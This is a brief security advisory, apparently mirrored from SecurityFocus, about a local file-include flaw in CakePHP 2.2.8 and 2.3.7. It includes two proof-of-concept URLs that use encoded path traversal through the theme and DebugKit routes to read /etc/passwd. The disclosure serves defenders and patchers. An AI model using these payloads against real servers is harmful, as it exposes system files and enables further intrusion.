11 lines
No EOL
690 B
Text
11 lines
No EOL
690 B
Text
source: https://www.securityfocus.com/bid/61746/info
|
|
|
|
CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
|
|
|
|
An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.
|
|
|
|
CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
|
|
|
|
http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd |